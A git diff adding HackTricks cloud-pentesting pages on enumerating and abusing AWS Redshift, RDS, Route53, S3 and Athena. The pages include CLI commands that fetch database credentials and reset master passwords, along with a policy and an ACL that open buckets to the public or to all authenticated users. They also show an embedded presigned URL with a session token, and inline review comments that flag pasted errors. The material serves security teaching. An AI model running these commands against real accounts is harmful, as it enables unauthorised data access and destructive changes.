+ +Using Redshift with CloudHSM + +When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates. + +This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition. + +You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition. + +If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised. + +During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'. + +
+ +### Enumeration + +```bash +# Get clusters +aws redshift describe-clusters +## Get if publicly accessible +aws redshift describe-clusters | jq -r ".Clusters[].PubliclyAccessible" +## Get DB username to login +aws redshift describe-clusters | jq -r ".Clusters[].MasterUsername" +## Get endpoint +aws redshift describe-clusters | jq -r ".Clusters[].Endpoint" +## Public addresses of the nodes +aws redshift describe-clusters | jq -r ".Clusters[].ClusterNodes[].PublicIPAddress" +## Get IAM roles of the clusters +aws redshift describe-clusters | jq -r ".Clusters[].IamRoles" + +# Endpoint access & authorization +aws redshift describe-endpoint-access +aws redshift describe-endpoint-authorization + +# Get credentials +aws redshift get-cluster-credentials --db-user --cluster-identifier +## By default, the temporary credentials expire in 900 seconds. You can optionally specify a duration between 900 seconds (15 minutes) and 3600 seconds (60 minutes). +aws redshift get-cluster-credentials-with-iam --cluster-identifier +## Gives creds to access redshift with the IAM redshift permissions given to the current AWS account +## More in https://docs.aws.amazon.com/redshift/latest/mgmt/redshift-iam-access-control-identity-based.html + +# Authentication profiles +aws redshift describe-authentication-profiles + +# Snapshots +aws redshift describe-cluster-snapshots + +# Scheduled actions +aws redshift describe-scheduled-actions + +# Connect +# The redshift instance must be publicly available (not by default), the sg need to allow inbounds connections to the port and you need creds +psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U admin -d dev -p 5439 +``` + +## Privesc + +{% content-ref url="../aws-privilege-escalation/aws-redshift-privesc.md" %} +[aws-redshift-privesc.md](../aws-privilege-escalation/aws-redshift-privesc.md) +{% endcontent-ref %} + +## Persistence + +The following actions allow to grant access to other AWS accounts to the cluster: + +* 
[authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html) +* [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
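Review bot: in aws-redshift-enum.md the last paragraph of the KMS section ("You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets...") is about S3 bucket logging, not Redshift, and looks pasted from another page; drop it or move it to the S3 page. Typos and grammar in the Amazon Redshift section: "four-tired hierarchy" should be "four-tiered hierarchy", "it can't be disable and vice versa" should be "it can't be disabled, and vice versa", "The tiering level of encryption keys are as follows" should be "The tiers of encryption keys are as follows", and "to gather greater understanding of vision for your business" is garbled. In the CloudHSM section "access development partition" should read "access the HSM partition", and the two bare `<br>` lines are residue of removed images (the "Using Redshift with CloudHSM" caption survives without its figure). In the Enumeration block the snapshot listing would be more useful with a filter on `.Snapshots[].AccountsWithRestoreAccess`, since cross-account snapshot grants are precisely the persistence mechanism the page lists under authorize-snapshot-access and the block already does the equivalent for endpoints with describe-endpoint-authorization. Finally, "The following actions allow to grant access" should be "allow granting access".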
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md b/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md new file mode 100644 index 0000000000..2b1ff5644e --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md @@ -0,0 +1,168 @@ +# AWS - Relational Database (RDS) Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +The **Relational Database Service (RDS)** offered by AWS is designed to streamline the deployment, operation, and scaling of a **relational database in the cloud**. This service offers the advantages of cost efficiency and scalability while automating labor-intensive tasks like hardware provisioning, database configuration, patching, and backups. + +AWS RDS supports various widely-used relational database engines including MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, and Amazon Aurora, with compatibility for both MySQL and PostgreSQL. + +Key features of RDS include: + +* **Management of database instances** is simplified. +* Creation of **read replicas** to enhance read performance. +* Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms. +* **Integration** with other AWS services, such as: + * AWS Identity and Access Management (**IAM**) for robust access control. + * AWS **CloudWatch** for comprehensive monitoring and metrics. + * AWS Key Management Service (**KMS**) for ensuring encryption at rest. + +## Credentials + +When creating the DB cluster the master **username** can be configured (**`admin`** by default). To generate the password of this user you can: + +* **Indicate** a **password** yourself +* Tell RDS to **auto generate** it +* Tell RDS to manage it in **AWS Secret Manager** encrypted with a KMS key + +
+ +### Authentication + +There are 3 types of authentication options, but using the **master password is always allowed**: + +
+ +### Public Access & VPC + +By default **no public access is granted** to the databases, however it **could be granted**. Therefore, by default only machines from the same VPC will be able to access it if the selected **security group** (are stored in EC2 SG)allows it. + +Instead of exposing a DB instance, it’s possible to create a **RDS Proxy** which **improves** the **scalability** & **availability** of the DB cluster. + +Moreover, the **database port can be modified** also. + +### Encryption + +**Encryption is enabled by default** using a AWS managed key (a CMK could be chosen instead). + +By enabling your encryption, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**.\ +It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**. + +However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted. + +#### Transparent Data Encryption (TDE) + +Alongside the encryption capabilities inherent to RDS at the application level, RDS also supports **additional platform-level encryption mechanisms** to safeguard data at rest. This includes **Transparent Data Encryption (TDE)** for Oracle and SQL Server. However, it's crucial to note that while TDE enhances security by encrypting data at rest, it may also **affect database performance**. This performance impact is especially noticeable when used in conjunction with MySQL cryptographic functions or Microsoft Transact-SQL cryptographic functions. + +To utilize TDE, certain preliminary steps are required: + +1. **Option Group Association**: + * The database must be associated with an option group. 
Option groups serve as containers for settings and features, facilitating database management, including security enhancements. + * However, it's important to note that option groups are only available for specific database engines and versions. +2. **Inclusion of TDE in Option Group**: + * Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group. + * It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed. +3. **TDE Encryption Modes**: + * TDE offers two distinct encryption modes: + * **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection. + * **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted. + +Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards. + +### Enumeration + +{% code overflow="wrap" %} +```bash +# Clusters info +## Get Endpoints, username, port, iam auth enabled, attached roles, SG +aws rds describe-db-clusters +aws rds describe-db-cluster-endpoints #Cluster URLs +aws rds describe-db-cluster-backtracks --db-cluster-identifier + +## Cluster snapshots +aws rds describe-db-cluster-snapshots + +# Get DB instances info +aws rds describe-db-instances #username, url, port, vpc, SG, is public? 
+aws rds describe-db-security-groups + +## Find automated backups +aws rds describe-db-instance-automated-backups + +## Find snapshots +aws rds describe-db-snapshots +aws rds describe-db-snapshots --include-public --snapshot-type public +## Restore snapshot as new instance +aws rds restore-db-instance-from-db-snapshot --db-instance-identifier --db-snapshot-identifier --availability-zone us-west-2a + +# Any public snapshot in the account +aws rds describe-db-snapshots --snapshot-type public + +# Proxies +aws rds describe-db-proxy-endpoints +aws rds describe-db-proxy-target-groups +aws rds describe-db-proxy-targets + +## reset credentials of MasterUsername +aws rds modify-db-instance --db-instance-identifier --master-user-password --apply-immediately +``` +{% endcode %} + +### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md" %} +[aws-rds-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md) +{% endcontent-ref %} + +### Privesc + +{% content-ref url="../aws-privilege-escalation/aws-rds-privesc.md" %} +[aws-rds-privesc.md](../aws-privilege-escalation/aws-rds-privesc.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-rds-post-exploitation.md" %} +[aws-rds-post-exploitation.md](../aws-post-exploitation/aws-rds-post-exploitation.md) +{% endcontent-ref %} + +### Persistence + +{% content-ref url="../aws-persistence/aws-rds-persistence.md" %} +[aws-rds-persistence.md](../aws-persistence/aws-rds-persistence.md) +{% endcontent-ref %} + +### SQL Injection + +There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. 
+ +{% embed url="https://book.hacktricks.xyz/pentesting-web/sql-injection" %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
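Review bot: in aws-relational-database-rds-enum.md the SQL Injection section says "There are ways to access DynamoDB data with SQL syntax", which is a copy-paste from the DynamoDB page; RDS engines are relational databases, so the sentence should simply state that applications querying RDS with user-controlled input are subject to ordinary SQL injection, with the embedded link as the reference. The Authentication section announces "There are 3 types of authentication options" but names none in text, the information lives only in the removed image (`<br>` residue); list them in text (password only, password plus IAM database authentication, password plus Kerberos authentication) so the page is usable without the screenshot. In the Enumeration block, `aws rds modify-db-instance --db-instance-identifier --master-user-password --apply-immediately` resets the production master password and is destructive, so it does not belong under Enumeration; move it to the Post Exploitation or Persistence section with a warning that it changes the live credential. The two public-snapshot lines (`--include-public --snapshot-type public` and the later `--snapshot-type public` marked "Any public snapshot in the account") duplicate each other, and `describe-db-security-groups` refers to the legacy DB security groups rather than the VPC security groups the text discusses, which deserves a comment. Smaller fixes: "TDE Tablespace Encryption: This mode encrypts entire tables" should say it encrypts whole tablespaces, "(are stored in EC2 SG)allows it" should be "(security groups are stored in EC2) allows it", "a AWS managed key" should be "an AWS managed key", "a RDS Proxy" should be "an RDS Proxy", and "can be modified also" should be "can also be modified".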
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md new file mode 100644 index 0000000000..96cc1cdee8 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md @@ -0,0 +1,57 @@ +# AWS - Route53 Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Route 53 + +Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\ +You can create https, http and tcp **health checks for web pages** via Route53. + +### IP-based routing + +This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\ +IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**. + +### Enumeration + +```bash +aws route53 list-hosted-zones # Get domains +aws route53 get-hosted-zone --id +aws route53 list-resource-record-sets --hosted-zone-id # Get all records +aws route53 list-health-checks +aws route53 list-traffic-policies +``` + +### Privesc + +{% content-ref url="../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md" %} +[route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md](../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md b/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md new file mode 100644 index 0000000000..8f64145bd1 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md @@ -0,0 +1,347 @@ +# AWS - S3, Athena & Glacier Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## S3 + +Amazon S3 is a service that allows you **store big amounts of data**. + +Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case. + +With resource-based permissions, you can define permissions for sub-directories of your bucket separately. + +### Bucket Versioning and MFA based delete + +When bucket versioning is enabled, any action that tries to alter a file inside a file will generate a new version of the file, keeping also the previous content of the same. Therefore, it won't overwrite its content. + +Moreover, MFA based delete will prevent versions of file in the S3 bucket from being deleted and also Bucket Versioning from being disabled, so an attacker won't be able to alter these files. + +### S3 Access logs + +It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket (both buckets must be in the same region). + +### S3 Presigned URLs + +It's possible to generate a presigned URL that can usually be used to **access the specified file** in the bucket. 
A **presigned URL looks like this**: + +``` +https://.s3.us-east-1.amazonaws.com/asd.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAUUE8GZC4S5L3TY3P%2F20230227%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230227T142551Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjELf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBhQpdETJO3HKKDk2hjNIrPWwBE8gZaQccZFV3kCpPCWAiEAid3ueDtFFU%2FOQfUpvxYTGO%2BHoS4SWDMUrQAE0pIaB40qggMIYBAAGgwzMTgxNDIxMzg1NTMiDJLI5t7gr2EGxG1Y5CrfAioW0foHIQ074y4gvk0c%2B%2Fmqc7cNWb1njQslQkeePHkseJ3owzc%2FCwkgE0EuZTd4mw0aJciA2XIbJRCLPWTb%2FCBKPnIMJ5aBzIiA2ltsiUNQTTUxYmEgXZoJ6rFYgcodnmWW0Et4Xw59UlHnCDB2bLImxPprriyCzDDCD6nLyp3J8pFF1S8h3ZTJE7XguA8joMs4%2B2B1%2FeOZfuxXKyXPYSKQOOSbQiHUQc%2BFnOfwxleRL16prWk1t7TamvHR%2Bt3UgMn5QWzB3p8FgWwpJ6GjHLkYMJZ379tkimL1tJ7o%2BIod%2FMYrS7LDCifP9d%2FuYOhKWGhaakPuJKJh9fl%2B0vGl7kmApXigROxEWon6ms75laXebltsWwKcKuYca%2BUWu4jVJx%2BWUfI4ofoaGiCSaKALTqwu4QNBRT%2BMoK6h%2BQa7gN7JFGg322lkxRY53x27WMbUE4unn5EmI54T4dWt1%2Bg8ljDS%2BvKfBjqmAWRwuqyfwXa5YC3xxttOr3YVvR6%2BaXpzWtvNJQNnb6v0uI3%2BTtTexZkJpLQYqFcgZLQSxsXWSnf988qvASCIUhAzp2UnS1uqy7QjtD5T73zksYN2aesll7rvB80qIuujG6NOdHnRJ2M5%2FKXXNo1Yd15MtzPuSjRoSB9RSMon5jFu31OrQnA9eCUoawxbB0nHqwK8a43CKBZHhA8RoUAJW%2B48EuFsp3U%3D&X-Amz-Signature=3436e4139e84dbcf5e2e6086c0ebc92f4e1e9332b6fda24697bc339acbf2cdfa +``` + +A presigned URL can be **created from the cli using credentials of a principal with access to the object** (if the account you use doesn't have access, a shorter presigned URL will be created but it will be useless) + +```bash + aws s3 presign --region 's3:///' +``` + +{% hint style="info" %} +The only required permission to generate a presigned URL is the permission being given, so for the previous command the only permission needed by the principal is `s3:GetObject` +{% endhint %} + +It's also possible to create presigned URLs with **other permissions**: + +```python +import boto3 +url = boto3.client('s3').generate_presigned_url( + 
ClientMethod='put_object', + Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'}, + ExpiresIn=3600 +) +``` + +### S3 Encryption Mechanisms + +**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data. + +
+ +Server-side encryption with S3 managed keys, SSE-S3 + +This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key. + +* Encryption: + * Object Data + created plaintext DEK --> Encrypted data (stored inside S3) + * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory +* Decryption: + * Encrypted DEK + S3 Master Key --> Plaintext DEK + * Plaintext DEK + Encrypted data --> Object Data + +Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control. + +
+ +
+ +Server-side encryption with KMS managed keys, SSE-KMS + +This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. + +* Encryption: + * S3 request data keys from KMS CMK + * KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£ + * S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key +* Decryption: + * S3 ask to KMS to decrypt the encrypted data key of the object + * KMS decrypt the data key with the CMK and send it back to S3 + * S3 decrypts the object data + +
+ +
+ +Server-side encryption with customer provided keys, SSE-C + +This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. + +* Encryption: + * The user sends the object data + Customer key to S3 + * The customer key is used to encrypt the data and the encrypted data is stored + * a salted HMAC value of the customer key is stored also for future key validation + * the customer key is deleted from memory +* Decryption: + * The user send the customer key + * The key is validated against the HMAC value stored + * The customer provided key is then used to decrypt the data + +
+ +
+ +Client-side encryption with KMS, CSE-KMS + +Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. + +* Encryption: + * Client request for a data key to KMS + * KMS returns the plaintext DEK and the encrypted DEK with the CMK + * Both keys are sent back + * The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3) +* Decryption: + * The encrypted data with the encrypted DEK is sent to the client + * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK + * The client can now decrypt the encrypted data + +
+ +
+ +Client-side encryption with customer provided keys, CSE-C + +Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. + +* Encryption: + * The client generates a DEK and encrypts the plaintext data + * Then, using it's own custom CMK it encrypts the DEK + * submit the encrypted data + encrypted DEK to S3 where it's stored +* Decryption: + * S3 sends the encrypted data and DEK + * As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data + +
+ +### **Enumeration** + +One of the traditional main ways of compromising AWS orgs start by compromising buckets publicly accesible. **You can find** [**public buckets enumerators in this page**](../aws-unauthenticated-enum-access/#s3-buckets)**.** + +```bash +# Get buckets ACLs +aws s3api get-bucket-acl --bucket +aws s3api get-object-acl --bucket --key flag + +# Get policy +aws s3api get-bucket-policy --bucket +aws s3api get-bucket-policy-status --bucket #if it's public + +# list S3 buckets associated with a profile +aws s3 ls +aws s3api list-buckets + +# list content of bucket (no creds) +aws s3 ls s3://bucket-name --no-sign-request +aws s3 ls s3://bucket-name --recursive + +# list content of bucket (with creds) +aws s3 ls s3://bucket-name +aws s3api list-objects-v2 --bucket +aws s3api list-objects --bucket +aws s3api list-object-versions --bucket + +# copy local folder to S3 +aws s3 cp MyFolder s3://bucket-name --recursive + +# delete +aws s3 rb s3://bucket-name –-force + +# download a whole S3 bucket +aws s3 sync s3:/// . 
+ +# move S3 bucket to different location +aws s3 sync s3://oldbucket s3://newbucket --source-region us-west-1 + +# list the sizes of an S3 bucket and its contents +aws s3api list-objects --bucket BUCKETNAME --output json --query "[sum(Contents[].Size), length(Contents[])]" + +# Update Bucket policy +aws s3api put-bucket-policy --policy file:///root/policy.json --bucket +##JSON policy example +{ + "Id": "Policy1568185116930", + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "Stmt1568184932403", + "Action": [ + "s3:ListBucket" + ], + "Effect": "Allow", + "Resource": "arn:aws:s3:::welcome", + "Principal": "*" + }, + { + "Sid": "Stmt1568185007451", + "Action": [ + "s3:GetObject" + ], + "Effect": "Allow", + "Resource": "arn:aws:s3:::welcome/*", + "Principal": "*" + } + ] +} + +# Update bucket ACL +aws s3api get-bucket-acl --bucket # Way 1 to get the ACL +aws s3api put-bucket-acl --bucket --access-control-policy file://acl.json + +aws s3api get-object-acl --bucket --key flag #Way 2 to get the ACL +aws s3api put-object-acl --bucket --key flag --access-control-policy file://objacl.json + +##JSON ACL example +## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. +{ + "Owner": { + "DisplayName": "", + "ID": "" + }, + "Grants": [ + { + "Grantee": { + "Type": "Group", + "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" + }, + "Permission": "FULL_CONTROL" + } + ] +} +## An ACL should give you the permission WRITE_ACP to be able to put a new ACL +``` + +### dual-stack + +You can access an S3 bucket through a dual-stack endpoint by using a virtual hosted-style or a path-style endpoint name. These are useful to access S3 through IPv6. 
+ +Dual-stack endpoints use the following syntax: + +* `bucketname.s3.dualstack.aws-region.amazonaws.com` +* `s3.dualstack.aws-region.amazonaws.com/bucketname` + +### Privesc + +In the following page you can check how to **abuse S3 permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-s3-privesc.md" %} +[aws-s3-privesc.md](../aws-privilege-escalation/aws-s3-privesc.md) +{% endcontent-ref %} + +### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md" %} +[aws-s3-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md) +{% endcontent-ref %} + +### S3 Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-s3-post-exploitation.md" %} +[aws-s3-post-exploitation.md](../aws-post-exploitation/aws-s3-post-exploitation.md) +{% endcontent-ref %} + +### Persistence + +{% content-ref url="../aws-persistence/aws-s3-persistence.md" %} +[aws-s3-persistence.md](../aws-persistence/aws-s3-persistence.md) +{% endcontent-ref %} + +## Other S3 vulns + +### S3 HTTP Cache Poisoning Issue + +[**According to this research**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue) it was possible to cache the response of an arbitrary bucket as if it belonged to a different one. This could have been abused to change for example javascript file responses and compromise arbitrary pages using S3 to store static code. + +## Amazon Athena + +Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**. + +You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from the logs, so you can query it. 
+ +Amazon Athena supports the **ability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**. + +**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**. + +SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query. + +### Enumeration + +```bash +# Get catalogs +aws athena list-data-catalogs + +# Get databases inside catalog +aws athena list-databases --catalog-name +aws athena list-table-metadata --catalog-name --database-name + +# Get query executions, queries and results +aws athena list-query-executions +aws athena get-query-execution --query-execution-id # Get query and meta of results +aws athena get-query-results --query-execution-id # This will rerun the query and get the results + +# Get workgroups & Prepared statements +aws athena list-work-groups +aws athena list-prepared-statements --work-group +aws athena get-prepared-statement --statement-name --work-group + +# Run query +aws athena start-query-execution --query-string +``` + +## References + +* [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3) +* [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html) + +{% hint style="success" %} +Learn & 
practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
